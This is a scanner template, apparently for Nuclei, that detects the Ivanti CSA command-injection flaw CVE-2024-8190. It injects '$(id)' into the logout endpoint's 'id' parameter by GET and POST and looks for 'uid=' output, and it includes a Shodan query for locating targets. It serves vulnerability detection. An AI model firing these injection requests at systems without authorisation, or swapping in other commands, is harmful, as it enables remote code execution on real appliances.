CVE-2024-8190 (Ivanti Command Injection)

Detect potentially vulnerable hosts using the Ivanti-CSA-Detect template

id: CVE-2024-8190

info:
  name: Ivanti CSA Command Injection (CVE-2024-8190)
  author: Redflare-Cyber
  severity: critical
  description: Detects unauthenticated command injection vulnerability in Ivanti CSA (CVE-2024-8190) using both GET and POST methods.
  classification:
    cwe-id: CWE-78
  metadata:
    shodan-query: http.html:'Ivanti(R) Cloud Services Appliance'
  reference:
    - https://www.horizon3.ai/attack-research/cisa-kev-cve-2024-8190-ivanti-csa-command-injection/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8190
    - https://github.com/horizon3ai/CVE-2024-8190
  tags: cve, rce, command-injection, ivanti, csa

http:
  # First request using GET method
  - method: GET
    path:
      - "{{BaseURL}}/auth/logout?id=$(id)"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    matchers:
      - type: regex
        regex:
          - 'uid=\d+'
        part: body
    # Stop execution if the vulnerability is found using GET
    stop-at-first-match: true

  # Second request using POST method
  - method: POST
    path:
      - "{{BaseURL}}/auth/logout"
    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    body: "id=$(id)"
    matchers:
      - type: regex
        regex:
          - 'uid=\d+'
        part: body